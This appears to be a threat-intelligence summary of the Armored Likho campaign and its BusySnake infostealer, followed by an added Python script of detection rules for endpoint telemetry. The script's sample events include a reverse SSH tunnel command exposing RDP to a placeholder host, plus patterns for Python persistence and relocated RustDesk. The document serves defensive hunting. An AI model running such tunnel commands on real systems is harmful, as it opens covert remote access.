Executive summary
On 3 July 2026, Kaspersky published a technical analysis attributing attacks on government agencies and the electric power sector across Russia, Brazil, and Kazakhstan to a previously undocumented threat actor it tracks as Armored Likho. The group is unusual in that it blends financially motivated campaigns against private individuals with targeted cyber espionage against organisations — and its toolkit is built around obfuscated, modular RATs and infostealers specifically engineered to bypass dynamic analysis.
At the centre of the current campaign is BusySnake Stealer, a previously unreported Python-based infostealer for Windows. Beyond broad data theft, it can raise a reverse SSH tunnel to its command-and-control server (integrating what was previously a standalone utility, Go2Tunnel, directly into the malware), install or hijack RustDesk for hands-on remote access, and dynamically deliver modules tailored to the victim's profile.
Kaspersky assesses possible overlaps with Eagle Werewolf, a cluster tracked by BI.ZONE since May 2023 with a record of targeting government and defence organisations — particularly those involved in UAV development — and of distributing malware through compromised Telegram channels. The overlaps include how both AquilaRAT and BusySnake receive C2 tasks, register persistence via scheduled tasks, and use similar C2 endpoints. The actor's exact origins remain unknown.
HLD assesses this campaign as a planning-relevant signal for government and critical-infrastructure operators generally: the tradecraft — analysis-resistant Python malware, abuse of legitimate remote-access tooling, GitHub-hosted staging, and indications of AI-assisted payload development — is portable well beyond the currently observed victim geography.
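The two behaviours the summary singles out as hunting leads, persistence through a scheduled task that launches a Python interpreter and remote access via a reverse SSH tunnel or a RustDesk binary dropped outside its normal install path, can be turned into triage rules over endpoint telemetry. The following is an added illustration, not code from Kaspersky, BI.ZONE or HLD: it assumes a simplified event shape (task-creation and process-creation records reduced to a command line, parent image and user) and constructed sample events; the regular expressions, the "expected" RustDesk path and the reason codes are the author's assumptions, not indicators from the report.

```python
"""Triage heuristics for scheduled-task Python persistence, reverse SSH
tunnels and relocated RustDesk binaries. Added example with constructed
telemetry; the patterns are assumptions, not published indicators."""
import re
from dataclasses import dataclass, field


@dataclass
class Event:
    kind: str            # "task_created" or "process_created" (assumed normalised shape)
    command: str         # task action or process command line
    parent: str = ""     # parent image, process events only
    user: str = ""


# Any CPython interpreter image name (python.exe, pythonw.exe, python3.11.exe ...).
PYTHON_RE = re.compile(r"python(?:w)?(?:\d+(?:\.\d+)?)?\.exe", re.I)
# Locations a standard user can write to without elevation (assumed list).
USER_WRITABLE_RE = re.compile(
    r"\\(?:Users\\[^\\]+\\(?:AppData|Downloads|Desktop|Documents)|ProgramData|Temp)\\", re.I)
RUSTDESK_RE = re.compile(r"rustdesk", re.I)
# Assumed default install path; a per-user or portable deployment would need allow-listing.
RUSTDESK_EXPECTED_RE = re.compile(
    r'^"?C:\\Program Files(?: \(x86\))?\\RustDesk\\rustdesk\.exe', re.I)
# ssh client invoked with remote port forwarding (-R), i.e. a reverse tunnel.
SSH_REVERSE_RE = re.compile(r"(?:^|\\|\s)ssh(?:\.exe)?\b.*\s-R\s*\S", re.I)


def classify(ev: Event) -> list:
    """Return reason codes for one event; an empty list means nothing to triage."""
    reasons = []
    if ev.kind == "task_created" and PYTHON_RE.search(ev.command) \
            and USER_WRITABLE_RE.search(ev.command):
        # Persistence via a scheduled task whose action is a Python script in a
        # user-writable directory. Developer hosts will need tuning.
        reasons.append("task-python-user-path")
    if RUSTDESK_RE.search(ev.command) and not RUSTDESK_EXPECTED_RE.match(ev.command):
        # RustDesk running from somewhere other than its expected install path.
        reasons.append("rustdesk-unexpected-path")
    if ev.kind == "process_created" and SSH_REVERSE_RE.search(ev.command) \
            and PYTHON_RE.search(ev.parent):
        # Reverse SSH tunnel whose parent is a Python interpreter.
        reasons.append("ssh-reverse-from-python")
    return reasons


def hunt(events: list) -> list:
    """Return (index, reasons) pairs for every event that triggers a rule."""
    out = []
    for i, ev in enumerate(events):
        reasons = classify(ev)
        if reasons:
            out.append((i, reasons))
    return out


# Constructed sample telemetry (paths, script names and the TEST-NET address
# 203.0.113.5 are invented for the example).
SAMPLE_EVENTS = [
    Event("task_created",
          r'"C:\Users\alice\AppData\Local\Programs\Python\Python311\pythonw.exe" '
          r'C:\Users\alice\AppData\Roaming\svc\update.py', user="alice"),
    Event("task_created", r'"C:\Program Files\Git\cmd\git.exe" fetch --all', user="alice"),
    Event("process_created",
          "ssh.exe -N -R 2222:127.0.0.1:3389 relay@203.0.113.5",
          parent=r"C:\Users\alice\AppData\Roaming\svc\pythonw.exe", user="alice"),
    Event("process_created",
          r"C:\Users\alice\AppData\Roaming\rd\rustdesk.exe --service",
          parent=r"C:\Users\alice\AppData\Roaming\svc\pythonw.exe", user="alice"),
    Event("process_created",
          r'"C:\Program Files\RustDesk\rustdesk.exe"',
          parent=r"C:\Windows\explorer.exe", user="bob"),
]


if __name__ == "__main__":
    for idx, reasons in hunt(SAMPLE_EVENTS):
        print(f"event {idx}: {', '.join(reasons)} :: {SAMPLE_EVENTS[idx].command}")
```

Run as a script it prints the three constructed events that trip a rule; the legitimately installed RustDesk and the git task are left alone. The rules are deliberately coarse triage filters to be layered on top of allow-lists for developer machines and sanctioned remote-support tooling, not stand-alone detections.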